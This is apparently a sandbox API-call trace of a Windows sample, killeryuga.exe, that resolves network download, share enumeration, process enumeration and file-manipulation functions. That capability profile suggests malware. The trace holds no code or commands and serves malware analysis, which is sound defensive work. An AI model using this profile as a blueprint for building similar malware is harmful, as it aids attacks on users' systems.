Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x76f5cc89 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76a80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = AngleArc, address_out = 0x76ac4124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDCBrushColor, address_out = 0x76ac232e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = FlattenPath, address_out = 0x76ac555d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetGraphicsMode, address_out = 0x76aa138a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetDIBits, address_out = 0x76a97590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x76ac439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x754aed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x75493e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
Fn
System Get Time type = Ticks, time = 94630 True 1
Fn
System Get Time type = Performance Ctr, time = 14013587204 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
System Get Info type = Operating System True 1
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Module Load module_name = MPR.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Module Load module_name = WINMM.dll, base_address = 0x75090000 True 1
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750926e0 True 1
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
